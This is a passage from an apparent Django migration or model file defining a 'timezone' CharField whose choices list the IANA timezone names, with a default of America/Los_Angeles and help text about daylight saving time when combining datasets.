('timezone', models.CharField(choices=[(b'Africa/Abidjan', b'Africa/Abidjan'), (b'Africa/Accra', b'Africa/Accra'), (b'Africa/Addis_Ababa', b'Africa/Addis_Ababa'), (b'Africa/Algiers', b'Africa/Algiers'), (b'Africa/Asmara', b'Africa/Asmara'), (b'Africa/Asmera', b'Africa/Asmera'), (b'Africa/Bamako', b'Africa/Bamako'), (b'Africa/Bangui', b'Africa/Bangui'), (b'Africa/Banjul', b'Africa/Banjul'), (b'Africa/Bissau', b'Africa/Bissau'), (b'Africa/Blantyre', b'Africa/Blantyre'), (b'Africa/Brazzaville', b'Africa/Brazzaville'), (b'Africa/Bujumbura', b'Africa/Bujumbura'), (b'Africa/Cairo', b'Africa/Cairo'), (b'Africa/Casablanca', b'Africa/Casablanca'), (b'Africa/Ceuta', b'Africa/Ceuta'), (b'Africa/Conakry', b'Africa/Conakry'), (b'Africa/Dakar', b'Africa/Dakar'), (b'Africa/Dar_es_Salaam', b'Africa/Dar_es_Salaam'), (b'Africa/Djibouti', b'Africa/Djibouti'), (b'Africa/Douala', b'Africa/Douala'), (b'Africa/El_Aaiun', b'Africa/El_Aaiun'), (b'Africa/Freetown', b'Africa/Freetown'), (b'Africa/Gaborone', b'Africa/Gaborone'), (b'Africa/Harare', b'Africa/Harare'), (b'Africa/Johannesburg', b'Africa/Johannesburg'), (b'Africa/Juba', b'Africa/Juba'), (b'Africa/Kampala', b'Africa/Kampala'), (b'Africa/Khartoum', b'Africa/Khartoum'), (b'Africa/Kigali', b'Africa/Kigali'), (b'Africa/Kinshasa', b'Africa/Kinshasa'), (b'Africa/Lagos', b'Africa/Lagos'), (b'Africa/Libreville', b'Africa/Libreville'), (b'Africa/Lome', b'Africa/Lome'), (b'Africa/Luanda', b'Africa/Luanda'), (b'Africa/Lubumbashi', b'Africa/Lubumbashi'), (b'Africa/Lusaka', b'Africa/Lusaka'), (b'Africa/Malabo', b'Africa/Malabo'), (b'Africa/Maputo', b'Africa/Maputo'), (b'Africa/Maseru', b'Africa/Maseru'), (b'Africa/Mbabane', b'Africa/Mbabane'), (b'Africa/Mogadishu', b'Africa/Mogadishu'), (b'Africa/Monrovia', b'Africa/Monrovia'), (b'Africa/Nairobi', b'Africa/Nairobi'), (b'Africa/Ndjamena', b'Africa/Ndjamena'), (b'Africa/Niamey', b'Africa/Niamey'), (b'Africa/Nouakchott', b'Africa/Nouakchott'), (b'Africa/Ouagadougou', b'Africa/Ouagadougou'), (b'Africa/Porto-Novo', b'Africa/Porto-Novo'), (b'Africa/Sao_Tome', b'Africa/Sao_Tome'), (b'Africa/Timbuktu', b'Africa/Timbuktu'), (b'Africa/Tripoli', b'Africa/Tripoli'), (b'Africa/Tunis', b'Africa/Tunis'), (b'Africa/Windhoek', b'Africa/Windhoek'), (b'America/Adak', b'America/Adak'), (b'America/Anchorage', b'America/Anchorage'), (b'America/Anguilla', b'America/Anguilla'), (b'America/Antigua', b'America/Antigua'), (b'America/Araguaina', b'America/Araguaina'), (b'America/Argentina/Buenos_Aires', b'America/Argentina/Buenos_Aires'), (b'America/Argentina/Catamarca', b'America/Argentina/Catamarca'), (b'America/Argentina/ComodRivadavia', b'America/Argentina/ComodRivadavia'), (b'America/Argentina/Cordoba', b'America/Argentina/Cordoba'), (b'America/Argentina/Jujuy', b'America/Argentina/Jujuy'), (b'America/Argentina/La_Rioja', b'America/Argentina/La_Rioja'), (b'America/Argentina/Mendoza', b'America/Argentina/Mendoza'), (b'America/Argentina/Rio_Gallegos', b'America/Argentina/Rio_Gallegos'), (b'America/Argentina/Salta', b'America/Argentina/Salta'), (b'America/Argentina/San_Juan', b'America/Argentina/San_Juan'), (b'America/Argentina/San_Luis', b'America/Argentina/San_Luis'), (b'America/Argentina/Tucuman', b'America/Argentina/Tucuman'), (b'America/Argentina/Ushuaia', b'America/Argentina/Ushuaia'), (b'America/Aruba', b'America/Aruba'), (b'America/Asuncion', b'America/Asuncion'), (b'America/Atikokan', b'America/Atikokan'), (b'America/Atka', b'America/Atka'), (b'America/Bahia', b'America/Bahia'), (b'America/Bahia_Banderas', b'America/Bahia_Banderas'), (b'America/Barbados', b'America/Barbados'), (b'America/Belem', b'America/Belem'), (b'America/Belize', b'America/Belize'), (b'America/Blanc-Sablon', b'America/Blanc-Sablon'), (b'America/Boa_Vista', b'America/Boa_Vista'), (b'America/Bogota', b'America/Bogota'), (b'America/Boise', b'America/Boise'), (b'America/Buenos_Aires', b'America/Buenos_Aires'), (b'America/Cambridge_Bay', b'America/Cambridge_Bay'), (b'America/Campo_Grande', b'America/Campo_Grande'), (b'America/Cancun', b'America/Cancun'), (b'America/Caracas', b'America/Caracas'), (b'America/Catamarca', b'America/Catamarca'), (b'America/Cayenne', b'America/Cayenne'), (b'America/Cayman', b'America/Cayman'), (b'America/Chicago', b'America/Chicago'), (b'America/Chihuahua', b'America/Chihuahua'), (b'America/Coral_Harbour', b'America/Coral_Harbour'), (b'America/Cordoba', b'America/Cordoba'), (b'America/Costa_Rica', b'America/Costa_Rica'), (b'America/Creston', b'America/Creston'), (b'America/Cuiaba', b'America/Cuiaba'), (b'America/Curacao', b'America/Curacao'), (b'America/Danmarkshavn', b'America/Danmarkshavn'), (b'America/Dawson', b'America/Dawson'), (b'America/Dawson_Creek', b'America/Dawson_Creek'), (b'America/Denver', b'America/Denver'), (b'America/Detroit', b'America/Detroit'), (b'America/Dominica', b'America/Dominica'), (b'America/Edmonton', b'America/Edmonton'), (b'America/Eirunepe', b'America/Eirunepe'), (b'America/El_Salvador', b'America/El_Salvador'), (b'America/Ensenada', b'America/Ensenada'), (b'America/Fort_Wayne', b'America/Fort_Wayne'), (b'America/Fortaleza', b'America/Fortaleza'), (b'America/Glace_Bay', b'America/Glace_Bay'), (b'America/Godthab', b'America/Godthab'), (b'America/Goose_Bay', b'America/Goose_Bay'), (b'America/Grand_Turk', b'America/Grand_Turk'), (b'America/Grenada', b'America/Grenada'), (b'America/Guadeloupe', b'America/Guadeloupe'), (b'America/Guatemala', b'America/Guatemala'), (b'America/Guayaquil', b'America/Guayaquil'), (b'America/Guyana', b'America/Guyana'), (b'America/Halifax', b'America/Halifax'), (b'America/Havana', b'America/Havana'), (b'America/Hermosillo', b'America/Hermosillo'), (b'America/Indiana/Indianapolis', b'America/Indiana/Indianapolis'), (b'America/Indiana/Knox', b'America/Indiana/Knox'), (b'America/Indiana/Marengo', b'America/Indiana/Marengo'), (b'America/Indiana/Petersburg', b'America/Indiana/Petersburg'), (b'America/Indiana/Tell_City', b'America/Indiana/Tell_City'), (b'America/Indiana/Vevay', b'America/Indiana/Vevay'), (b'America/Indiana/Vincennes', b'America/Indiana/Vincennes'), (b'America/Indiana/Winamac', b'America/Indiana/Winamac'), (b'America/Indianapolis', b'America/Indianapolis'), (b'America/Inuvik', b'America/Inuvik'), (b'America/Iqaluit', b'America/Iqaluit'), (b'America/Jamaica', b'America/Jamaica'), (b'America/Jujuy', b'America/Jujuy'), (b'America/Juneau', b'America/Juneau'), (b'America/Kentucky/Louisville', b'America/Kentucky/Louisville'), (b'America/Kentucky/Monticello', b'America/Kentucky/Monticello'), (b'America/Knox_IN', b'America/Knox_IN'), (b'America/Kralendijk', b'America/Kralendijk'), (b'America/La_Paz', b'America/La_Paz'), (b'America/Lima', b'America/Lima'), (b'America/Los_Angeles', b'America/Los_Angeles'), (b'America/Louisville', b'America/Louisville'), (b'America/Lower_Princes', b'America/Lower_Princes'), (b'America/Maceio', b'America/Maceio'), (b'America/Managua', b'America/Managua'), (b'America/Manaus', b'America/Manaus'), (b'America/Marigot', b'America/Marigot'), (b'America/Martinique', b'America/Martinique'), (b'America/Matamoros', b'America/Matamoros'), (b'America/Mazatlan', b'America/Mazatlan'), (b'America/Mendoza', b'America/Mendoza'), (b'America/Menominee', b'America/Menominee'), (b'America/Merida', b'America/Merida'), (b'America/Metlakatla', b'America/Metlakatla'), (b'America/Mexico_City', b'America/Mexico_City'), (b'America/Miquelon', b'America/Miquelon'), (b'America/Moncton', b'America/Moncton'), (b'America/Monterrey', b'America/Monterrey'), (b'America/Montevideo', b'America/Montevideo'), (b'America/Montreal', b'America/Montreal'), (b'America/Montserrat', b'America/Montserrat'), (b'America/Nassau', b'America/Nassau'), (b'America/New_York', b'America/New_York'), (b'America/Nipigon', b'America/Nipigon'), (b'America/Nome', b'America/Nome'), (b'America/Noronha', b'America/Noronha'), (b'America/North_Dakota/Beulah', b'America/North_Dakota/Beulah'), (b'America/North_Dakota/Center', b'America/North_Dakota/Center'), (b'America/North_Dakota/New_Salem', b'America/North_Dakota/New_Salem'), (b'America/Ojinaga', b'America/Ojinaga'), (b'America/Panama', b'America/Panama'), (b'America/Pangnirtung', b'America/Pangnirtung'), (b'America/Paramaribo', b'America/Paramaribo'), (b'America/Phoenix', b'America/Phoenix'), (b'America/Port-au-Prince', b'America/Port-au-Prince'), (b'America/Port_of_Spain', b'America/Port_of_Spain'), (b'America/Porto_Acre', b'America/Porto_Acre'), (b'America/Porto_Velho', b'America/Porto_Velho'), (b'America/Puerto_Rico', b'America/Puerto_Rico'), (b'America/Rainy_River', b'America/Rainy_River'), (b'America/Rankin_Inlet', b'America/Rankin_Inlet'), (b'America/Recife', b'America/Recife'), (b'America/Regina', b'America/Regina'), (b'America/Resolute', b'America/Resolute'), (b'America/Rio_Branco', b'America/Rio_Branco'), (b'America/Rosario', b'America/Rosario'), (b'America/Santa_Isabel', b'America/Santa_Isabel'), (b'America/Santarem', b'America/Santarem'), (b'America/Santiago', b'America/Santiago'), (b'America/Santo_Domingo', b'America/Santo_Domingo'), (b'America/Sao_Paulo', b'America/Sao_Paulo'), (b'America/Scoresbysund', b'America/Scoresbysund'), (b'America/Shiprock', b'America/Shiprock'), (b'America/Sitka', b'America/Sitka'), (b'America/St_Barthelemy', b'America/St_Barthelemy'), (b'America/St_Johns', b'America/St_Johns'), (b'America/St_Kitts', b'America/St_Kitts'), (b'America/St_Lucia', b'America/St_Lucia'), (b'America/St_Thomas', b'America/St_Thomas'), (b'America/St_Vincent', b'America/St_Vincent'), (b'America/Swift_Current', b'America/Swift_Current'), (b'America/Tegucigalpa', b'America/Tegucigalpa'), (b'America/Thule', b'America/Thule'), (b'America/Thunder_Bay', b'America/Thunder_Bay'), (b'America/Tijuana', b'America/Tijuana'), (b'America/Toronto', b'America/Toronto'), (b'America/Tortola', b'America/Tortola'), (b'America/Vancouver', b'America/Vancouver'), (b'America/Virgin', b'America/Virgin'), (b'America/Whitehorse', b'America/Whitehorse'), (b'America/Winnipeg', b'America/Winnipeg'), (b'America/Yakutat', b'America/Yakutat'), (b'America/Yellowknife', b'America/Yellowknife'), (b'Antarctica/Casey', b'Antarctica/Casey'), (b'Antarctica/Davis', b'Antarctica/Davis'), (b'Antarctica/DumontDUrville', b'Antarctica/DumontDUrville'), (b'Antarctica/Macquarie', b'Antarctica/Macquarie'), (b'Antarctica/Mawson', b'Antarctica/Mawson'), (b'Antarctica/McMurdo', b'Antarctica/McMurdo'), (b'Antarctica/Palmer', b'Antarctica/Palmer'), (b'Antarctica/Rothera', b'Antarctica/Rothera'), (b'Antarctica/South_Pole', b'Antarctica/South_Pole'), (b'Antarctica/Syowa', b'Antarctica/Syowa'), (b'Antarctica/Vostok', b'Antarctica/Vostok'), (b'Arctic/Longyearbyen', b'Arctic/Longyearbyen'), (b'Asia/Aden', b'Asia/Aden'), (b'Asia/Almaty', b'Asia/Almaty'), (b'Asia/Amman', b'Asia/Amman'), (b'Asia/Anadyr', b'Asia/Anadyr'), (b'Asia/Aqtau', b'Asia/Aqtau'), (b'Asia/Aqtobe', b'Asia/Aqtobe'), (b'Asia/Ashgabat', b'Asia/Ashgabat'), (b'Asia/Ashkhabad', b'Asia/Ashkhabad'), (b'Asia/Baghdad', b'Asia/Baghdad'), (b'Asia/Bahrain', b'Asia/Bahrain'), (b'Asia/Baku', b'Asia/Baku'), (b'Asia/Bangkok', b'Asia/Bangkok'), (b'Asia/Beijing', b'Asia/Beijing'), (b'Asia/Beirut', b'Asia/Beirut'), (b'Asia/Bishkek', b'Asia/Bishkek'), (b'Asia/Brunei', b'Asia/Brunei'), (b'Asia/Calcutta', b'Asia/Calcutta'), (b'Asia/Choibalsan', b'Asia/Choibalsan'), (b'Asia/Chongqing', b'Asia/Chongqing'), (b'Asia/Chungking', b'Asia/Chungking'), (b'Asia/Colombo', b'Asia/Colombo'), (b'Asia/Dacca', b'Asia/Dacca'), (b'Asia/Damascus', b'Asia/Damascus'), (b'Asia/Dhaka', b'Asia/Dhaka'), (b'Asia/Dili', b'Asia/Dili'), (b'Asia/Dubai', b'Asia/Dubai'), (b'Asia/Dushanbe', b'Asia/Dushanbe'), (b'Asia/Gaza', b'Asia/Gaza'), (b'Asia/Harbin', b'Asia/Harbin'), (b'Asia/Hebron', b'Asia/Hebron'), (b'Asia/Ho_Chi_Minh', b'Asia/Ho_Chi_Minh'), (b'Asia/Hong_Kong', b'Asia/Hong_Kong'), (b'Asia/Hovd', b'Asia/Hovd'), (b'Asia/Irkutsk', b'Asia/Irkutsk'), (b'Asia/Istanbul', b'Asia/Istanbul'), (b'Asia/Jakarta', b'Asia/Jakarta'), (b'Asia/Jayapura', b'Asia/Jayapura'), (b'Asia/Jerusalem', b'Asia/Jerusalem'), (b'Asia/Kabul', b'Asia/Kabul'), (b'Asia/Kamchatka', b'Asia/Kamchatka'), (b'Asia/Karachi', b'Asia/Karachi'), (b'Asia/Kashgar', b'Asia/Kashgar'), (b'Asia/Kathmandu', b'Asia/Kathmandu'), (b'Asia/Katmandu', b'Asia/Katmandu'), (b'Asia/Kolkata', b'Asia/Kolkata'), (b'Asia/Krasnoyarsk', b'Asia/Krasnoyarsk'), (b'Asia/Kuala_Lumpur', b'Asia/Kuala_Lumpur'), (b'Asia/Kuching', b'Asia/Kuching'), (b'Asia/Kuwait', b'Asia/Kuwait'), (b'Asia/Macao', b'Asia/Macao'), (b'Asia/Macau', b'Asia/Macau'), (b'Asia/Magadan', b'Asia/Magadan'), (b'Asia/Makassar', b'Asia/Makassar'), (b'Asia/Manila', b'Asia/Manila'), (b'Asia/Muscat', b'Asia/Muscat'), (b'Asia/Nicosia', b'Asia/Nicosia'), (b'Asia/Novokuznetsk', b'Asia/Novokuznetsk'), (b'Asia/Novosibirsk', b'Asia/Novosibirsk'), (b'Asia/Omsk', b'Asia/Omsk'), (b'Asia/Oral', b'Asia/Oral'), (b'Asia/Phnom_Penh', b'Asia/Phnom_Penh'), (b'Asia/Pontianak', b'Asia/Pontianak'), (b'Asia/Pyongyang', b'Asia/Pyongyang'), (b'Asia/Qatar', b'Asia/Qatar'), (b'Asia/Qyzylorda', b'Asia/Qyzylorda'), (b'Asia/Rangoon', b'Asia/Rangoon'), (b'Asia/Riyadh', b'Asia/Riyadh'), (b'Asia/Riyadh87', b'Asia/Riyadh87'), (b'Asia/Riyadh88', b'Asia/Riyadh88'), (b'Asia/Riyadh89', b'Asia/Riyadh89'), (b'Asia/Saigon', b'Asia/Saigon'), (b'Asia/Sakhalin', b'Asia/Sakhalin'), (b'Asia/Samarkand', b'Asia/Samarkand'), (b'Asia/Seoul', b'Asia/Seoul'), (b'Asia/Shanghai', b'Asia/Shanghai'), (b'Asia/Singapore', b'Asia/Singapore'), (b'Asia/Taipei', b'Asia/Taipei'), (b'Asia/Tashkent', b'Asia/Tashkent'), (b'Asia/Tbilisi', b'Asia/Tbilisi'), (b'Asia/Tehran', b'Asia/Tehran'), (b'Asia/Tel_Aviv', b'Asia/Tel_Aviv'), (b'Asia/Thimbu', b'Asia/Thimbu'), (b'Asia/Thimphu', b'Asia/Thimphu'), (b'Asia/Tokyo', b'Asia/Tokyo'), (b'Asia/Ujung_Pandang', b'Asia/Ujung_Pandang'), (b'Asia/Ulaanbaatar', b'Asia/Ulaanbaatar'), (b'Asia/Ulan_Bator', b'Asia/Ulan_Bator'), (b'Asia/Urumqi', b'Asia/Urumqi'), (b'Asia/Vientiane', b'Asia/Vientiane'), (b'Asia/Vladivostok', b'Asia/Vladivostok'), (b'Asia/Yakutsk', b'Asia/Yakutsk'), (b'Asia/Yekaterinburg', b'Asia/Yekaterinburg'), (b'Asia/Yerevan', b'Asia/Yerevan'), (b'Atlantic/Azores', b'Atlantic/Azores'), (b'Atlantic/Bermuda', b'Atlantic/Bermuda'), (b'Atlantic/Canary', b'Atlantic/Canary'), (b'Atlantic/Cape_Verde', b'Atlantic/Cape_Verde'), (b'Atlantic/Faeroe', b'Atlantic/Faeroe'), (b'Atlantic/Faroe', b'Atlantic/Faroe'), (b'Atlantic/Jan_Mayen', b'Atlantic/Jan_Mayen'), (b'Atlantic/Madeira', b'Atlantic/Madeira'), (b'Atlantic/Reykjavik', b'Atlantic/Reykjavik'), (b'Atlantic/South_Georgia', b'Atlantic/South_Georgia'), (b'Atlantic/St_Helena', b'Atlantic/St_Helena'), (b'Atlantic/Stanley', b'Atlantic/Stanley'), (b'Australia/ACT', b'Australia/ACT'), (b'Australia/Adelaide', b'Australia/Adelaide'), (b'Australia/Brisbane', b'Australia/Brisbane'), (b'Australia/Broken_Hill', b'Australia/Broken_Hill'), (b'Australia/Canberra', b'Australia/Canberra'), (b'Australia/Currie', b'Australia/Currie'), (b'Australia/Darwin', b'Australia/Darwin'), (b'Australia/Eucla', b'Australia/Eucla'), (b'Australia/Hobart', b'Australia/Hobart'), (b'Australia/LHI', b'Australia/LHI'), (b'Australia/Lindeman', b'Australia/Lindeman'), (b'Australia/Lord_Howe', b'Australia/Lord_Howe'), (b'Australia/Melbourne', b'Australia/Melbourne'), (b'Australia/NSW', b'Australia/NSW'), (b'Australia/North', b'Australia/North'), (b'Australia/Perth', b'Australia/Perth'), (b'Australia/Queensland', b'Australia/Queensland'), (b'Australia/South', b'Australia/South'), (b'Australia/Sydney', b'Australia/Sydney'), (b'Australia/Tasmania', b'Australia/Tasmania'), (b'Australia/Victoria', b'Australia/Victoria'), (b'Australia/West', b'Australia/West'), (b'Australia/Yancowinna', b'Australia/Yancowinna'), (b'Brazil/Acre', b'Brazil/Acre'), (b'Brazil/DeNoronha', b'Brazil/DeNoronha'), (b'Brazil/East', b'Brazil/East'), (b'Brazil/West', b'Brazil/West'), (b'CET', b'CET'), (b'CST6CDT', b'CST6CDT'), (b'Canada/Atlantic', b'Canada/Atlantic'), (b'Canada/Central', b'Canada/Central'), (b'Canada/East-Saskatchewan', b'Canada/East-Saskatchewan'), (b'Canada/Eastern', b'Canada/Eastern'), (b'Canada/Mountain', b'Canada/Mountain'), (b'Canada/Newfoundland', b'Canada/Newfoundland'), (b'Canada/Pacific', b'Canada/Pacific'), (b'Canada/Saskatchewan', b'Canada/Saskatchewan'), (b'Canada/Yukon', b'Canada/Yukon'), (b'Chile/Continental', b'Chile/Continental'), (b'Chile/EasterIsland', b'Chile/EasterIsland'), (b'Cuba', b'Cuba'), (b'EET', b'EET'), (b'EST', b'EST'), (b'EST5EDT', b'EST5EDT'), (b'Egypt', b'Egypt'), (b'Eire', b'Eire'), (b'Etc/GMT', b'Etc/GMT'), (b'Etc/GMT+0', b'Etc/GMT+0'), (b'Etc/GMT+1', b'Etc/GMT+1'), (b'Etc/GMT+10', b'Etc/GMT+10'), (b'Etc/GMT+11', b'Etc/GMT+11'), (b'Etc/GMT+12', b'Etc/GMT+12'), (b'Etc/GMT+2', b'Etc/GMT+2'), (b'Etc/GMT+3', b'Etc/GMT+3'), (b'Etc/GMT+4', b'Etc/GMT+4'), (b'Etc/GMT+5', b'Etc/GMT+5'), (b'Etc/GMT+6', b'Etc/GMT+6'), (b'Etc/GMT+7', b'Etc/GMT+7'), (b'Etc/GMT+8', b'Etc/GMT+8'), (b'Etc/GMT+9', b'Etc/GMT+9'), (b'Etc/GMT-0', b'Etc/GMT-0'), (b'Etc/GMT-1', b'Etc/GMT-1'), (b'Etc/GMT-10', b'Etc/GMT-10'), (b'Etc/GMT-11', b'Etc/GMT-11'), (b'Etc/GMT-12', b'Etc/GMT-12'), (b'Etc/GMT-13', b'Etc/GMT-13'), (b'Etc/GMT-14', b'Etc/GMT-14'), (b'Etc/GMT-2', b'Etc/GMT-2'), (b'Etc/GMT-3', b'Etc/GMT-3'), (b'Etc/GMT-4', b'Etc/GMT-4'), (b'Etc/GMT-5', b'Etc/GMT-5'), (b'Etc/GMT-6', b'Etc/GMT-6'), (b'Etc/GMT-7', b'Etc/GMT-7'), (b'Etc/GMT-8', b'Etc/GMT-8'), (b'Etc/GMT-9', b'Etc/GMT-9'), (b'Etc/GMT0', b'Etc/GMT0'), (b'Etc/Greenwich', b'Etc/Greenwich'), (b'Etc/UCT', b'Etc/UCT'), (b'Etc/UTC', b'Etc/UTC'), (b'Etc/Universal', b'Etc/Universal'), (b'Etc/Zulu', b'Etc/Zulu'), (b'Europe/Amsterdam', b'Europe/Amsterdam'), (b'Europe/Andorra', b'Europe/Andorra'), (b'Europe/Athens', b'Europe/Athens'), (b'Europe/Belfast', b'Europe/Belfast'), (b'Europe/Belgrade', b'Europe/Belgrade'), (b'Europe/Berlin', b'Europe/Berlin'), (b'Europe/Bratislava', b'Europe/Bratislava'), (b'Europe/Brussels', b'Europe/Brussels'), (b'Europe/Bucharest', b'Europe/Bucharest'), (b'Europe/Budapest', b'Europe/Budapest'), (b'Europe/Chisinau', b'Europe/Chisinau'), (b'Europe/Copenhagen', b'Europe/Copenhagen'), (b'Europe/Dublin', b'Europe/Dublin'), (b'Europe/Gibraltar', b'Europe/Gibraltar'), (b'Europe/Guernsey', b'Europe/Guernsey'), (b'Europe/Helsinki', b'Europe/Helsinki'), (b'Europe/Isle_of_Man', b'Europe/Isle_of_Man'), (b'Europe/Istanbul', b'Europe/Istanbul'), (b'Europe/Jersey', b'Europe/Jersey'), (b'Europe/Kaliningrad', b'Europe/Kaliningrad'), (b'Europe/Kiev', b'Europe/Kiev'), (b'Europe/Lisbon', b'Europe/Lisbon'), (b'Europe/Ljubljana', b'Europe/Ljubljana'), (b'Europe/London', b'Europe/London'), (b'Europe/Luxembourg', b'Europe/Luxembourg'), (b'Europe/Madrid', b'Europe/Madrid'), (b'Europe/Malta', b'Europe/Malta'), (b'Europe/Mariehamn', b'Europe/Mariehamn'), (b'Europe/Minsk', b'Europe/Minsk'), (b'Europe/Monaco', b'Europe/Monaco'), (b'Europe/Moscow', b'Europe/Moscow'), (b'Europe/Nicosia', b'Europe/Nicosia'), (b'Europe/Oslo', b'Europe/Oslo'), (b'Europe/Paris', b'Europe/Paris'), (b'Europe/Podgorica', b'Europe/Podgorica'), (b'Europe/Prague', b'Europe/Prague'), (b'Europe/Riga', b'Europe/Riga'), (b'Europe/Rome', b'Europe/Rome'), (b'Europe/Samara', b'Europe/Samara'), (b'Europe/San_Marino', b'Europe/San_Marino'), (b'Europe/Sarajevo', b'Europe/Sarajevo'), (b'Europe/Simferopol', b'Europe/Simferopol'), (b'Europe/Skopje', b'Europe/Skopje'), (b'Europe/Sofia', b'Europe/Sofia'), (b'Europe/Stockholm', b'Europe/Stockholm'), (b'Europe/Tallinn', b'Europe/Tallinn'), (b'Europe/Tirane', b'Europe/Tirane'), (b'Europe/Tiraspol', b'Europe/Tiraspol'), (b'Europe/Uzhgorod', b'Europe/Uzhgorod'), (b'Europe/Vaduz', b'Europe/Vaduz'), (b'Europe/Vatican', b'Europe/Vatican'), (b'Europe/Vienna', b'Europe/Vienna'), (b'Europe/Vilnius', b'Europe/Vilnius'), (b'Europe/Volgograd', b'Europe/Volgograd'), (b'Europe/Warsaw', b'Europe/Warsaw'), (b'Europe/Zagreb', b'Europe/Zagreb'), (b'Europe/Zaporozhye', b'Europe/Zaporozhye'), (b'Europe/Zurich', b'Europe/Zurich'), (b'Factory', b'Factory'), (b'GB', b'GB'), (b'GB-Eire', b'GB-Eire'), (b'GMT', b'GMT'), (b'GMT+0', b'GMT+0'), (b'GMT+1', b'GMT+1'), (b'GMT+10', b'GMT+10'), (b'GMT+11', b'GMT+11'), (b'GMT+12', b'GMT+12'), (b'GMT+13', b'GMT+13'), (b'GMT+14', b'GMT+14'), (b'GMT+2', b'GMT+2'), (b'GMT+3', b'GMT+3'), (b'GMT+4', b'GMT+4'), (b'GMT+5', b'GMT+5'), (b'GMT+6', b'GMT+6'), (b'GMT+7', b'GMT+7'), (b'GMT+8', b'GMT+8'), (b'GMT+9', b'GMT+9'), (b'GMT-0', b'GMT-0'), (b'GMT-1', b'GMT-1'), (b'GMT-10', b'GMT-10'), (b'GMT-11', b'GMT-11'), (b'GMT-12', b'GMT-12'), (b'GMT-2', b'GMT-2'), (b'GMT-3', b'GMT-3'), (b'GMT-4', b'GMT-4'), (b'GMT-5', b'GMT-5'), (b'GMT-6', b'GMT-6'), (b'GMT-7', b'GMT-7'), (b'GMT-8', b'GMT-8'), (b'GMT-9', b'GMT-9'), (b'GMT0', b'GMT0'), (b'Greenwich', b'Greenwich'), (b'HST', b'HST'), (b'Hongkong', b'Hongkong'), (b'Iceland', b'Iceland'), (b'Indian/Antananarivo', b'Indian/Antananarivo'), (b'Indian/Chagos', b'Indian/Chagos'), (b'Indian/Christmas', b'Indian/Christmas'), (b'Indian/Cocos', b'Indian/Cocos'), (b'Indian/Comoro', b'Indian/Comoro'), (b'Indian/Kerguelen', b'Indian/Kerguelen'), (b'Indian/Mahe', b'Indian/Mahe'), (b'Indian/Maldives', b'Indian/Maldives'), (b'Indian/Mauritius', b'Indian/Mauritius'), (b'Indian/Mayotte', b'Indian/Mayotte'), (b'Indian/Reunion', b'Indian/Reunion'), (b'Iran', b'Iran'), (b'Israel', b'Israel'), (b'Jamaica', b'Jamaica'), (b'Japan', b'Japan'), (b'Kwajalein', b'Kwajalein'), (b'Libya', b'Libya'), (b'MET', b'MET'), (b'MST', b'MST'), (b'MST7MDT', b'MST7MDT'), (b'Mexico/BajaNorte', b'Mexico/BajaNorte'), (b'Mexico/BajaSur', b'Mexico/BajaSur'), (b'Mexico/General', b'Mexico/General'), (b'Mideast/Riyadh87', b'Mideast/Riyadh87'), (b'Mideast/Riyadh88', b'Mideast/Riyadh88'), (b'Mideast/Riyadh89', b'Mideast/Riyadh89'), (b'NZ', b'NZ'), (b'NZ-CHAT', b'NZ-CHAT'), (b'Navajo', b'Navajo'), (b'PRC', b'PRC'), (b'PST8PDT', b'PST8PDT'), (b'Pacific/Apia', b'Pacific/Apia'), (b'Pacific/Auckland', b'Pacific/Auckland'), (b'Pacific/Chatham', b'Pacific/Chatham'), (b'Pacific/Chuuk', b'Pacific/Chuuk'), (b'Pacific/Easter', b'Pacific/Easter'), (b'Pacific/Efate', b'Pacific/Efate'), (b'Pacific/Enderbury', b'Pacific/Enderbury'), (b'Pacific/Fakaofo', b'Pacific/Fakaofo'), (b'Pacific/Fiji', b'Pacific/Fiji'), (b'Pacific/Funafuti', b'Pacific/Funafuti'), (b'Pacific/Galapagos', b'Pacific/Galapagos'), (b'Pacific/Gambier', b'Pacific/Gambier'), (b'Pacific/Guadalcanal', b'Pacific/Guadalcanal'), (b'Pacific/Guam', b'Pacific/Guam'), (b'Pacific/Honolulu', b'Pacific/Honolulu'), (b'Pacific/Johnston', b'Pacific/Johnston'), (b'Pacific/Kiritimati', b'Pacific/Kiritimati'), (b'Pacific/Kosrae', b'Pacific/Kosrae'), (b'Pacific/Kwajalein', b'Pacific/Kwajalein'), (b'Pacific/Majuro', b'Pacific/Majuro'), (b'Pacific/Marquesas', b'Pacific/Marquesas'), (b'Pacific/Midway', b'Pacific/Midway'), (b'Pacific/Nauru', b'Pacific/Nauru'), (b'Pacific/Niue', b'Pacific/Niue'), (b'Pacific/Norfolk', b'Pacific/Norfolk'), (b'Pacific/Noumea', b'Pacific/Noumea'), (b'Pacific/Pago_Pago', b'Pacific/Pago_Pago'), (b'Pacific/Palau', b'Pacific/Palau'), (b'Pacific/Pitcairn', b'Pacific/Pitcairn'), (b'Pacific/Pohnpei', b'Pacific/Pohnpei'), (b'Pacific/Ponape', b'Pacific/Ponape'), (b'Pacific/Port_Moresby', b'Pacific/Port_Moresby'), (b'Pacific/Rarotonga', b'Pacific/Rarotonga'), (b'Pacific/Saipan', b'Pacific/Saipan'), (b'Pacific/Samoa', b'Pacific/Samoa'), (b'Pacific/Tahiti', b'Pacific/Tahiti'), (b'Pacific/Tarawa', b'Pacific/Tarawa'), (b'Pacific/Tongatapu', b'Pacific/Tongatapu'), (b'Pacific/Truk', b'Pacific/Truk'), (b'Pacific/Wake', b'Pacific/Wake'), (b'Pacific/Wallis', b'Pacific/Wallis'), (b'Pacific/Yap', b'Pacific/Yap'), (b'Poland', b'Poland'), (b'Portugal', b'Portugal'), (b'ROC', b'ROC'), (b'ROK', b'ROK'), (b'Singapore', b'Singapore'), (b'Turkey', b'Turkey'), (b'UCT', b'UCT'), (b'US/Alaska', b'US/Alaska'), (b'US/Aleutian', b'US/Aleutian'), (b'US/Arizona', b'US/Arizona'), (b'US/Central', b'US/Central'), (b'US/East-Indiana', b'US/East-Indiana'), (b'US/Eastern', b'US/Eastern'), (b'US/Hawaii', b'US/Hawaii'), (b'US/Indiana-Starke', b'US/Indiana-Starke'), (b'US/Michigan', b'US/Michigan'), (b'US/Mountain', b'US/Mountain'), (b'US/Pacific', b'US/Pacific'), (b'US/Pacific-New', b'US/Pacific-New'), (b'US/Samoa', b'US/Samoa'), (b'Universal', b'Universal'), (b'W-SU', b'W-SU'), (b'WET', b'WET'), (b'Zulu', b'Zulu')], default=b'America/Los_Angeles', help_text='The timezone of the dataset. Only used for managing the daylight saving time changes when combining several datasets.', max_length=24, verbose_name='Timezone')),
